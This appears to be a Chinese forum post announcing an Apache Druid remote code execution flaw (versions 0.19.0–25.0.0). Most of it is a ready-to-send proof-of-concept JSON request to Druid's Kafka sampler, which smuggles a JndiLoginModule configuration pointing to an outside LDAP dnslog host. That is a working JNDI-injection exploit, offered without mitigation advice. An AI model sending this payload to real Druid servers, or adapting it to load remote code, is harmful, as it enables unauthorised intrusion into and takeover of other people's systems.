90_ 发表于 2023-4-23 14:12:03

Apache Druid远程代码执行漏洞

Apache Druid是一个高性能的实时大数据分析引擎,支持快速数据摄取、实时查询和数据可视化。它主要用于OLAP(在线分析处理)场景,能处理PB级别的数据。Druid具有高度可扩展、低延迟和高吞吐量的特点,广泛应用于实时监控、事件驱动分析、用户行为分析、网络安全等领域。通过使用Druid,企业和开发者可以快速获得实时分析结果,提升决策效率。

影响版本
0.19.0 <= Apache Druid <= 25.0.0

不受影响版本
Apache Druid >= 26.0.0(修复版本尚未正式发布)


dnslog测试POC代码:
{
    "type":"kafka",
    "spec":{
      "type":"kafka",
      "ioConfig":{
            "type":"kafka",
            "consumerProperties":{
                "bootstrap.servers":"6.6.6.6:9092",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://1nu5tj.dnslog.cn\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
            },
            "topic":"any",
            "useEarliestOffset":true,
            "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                  "raw"
                ]
            }
      },
      "dataSchema":{
            "dataSource":"sample",
            "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
            },
            "dimensionsSpec":{

            },
            "granularitySpec":{
                "rollup":false
            }
      },
      "tuningConfig":{
            "type":"kafka"
      }
    },
    "samplerConfig":{
      "numRows":500,
      "timeoutMs":15000
    }
}
页: [1]
查看完整版本: Apache Druid远程代码执行漏洞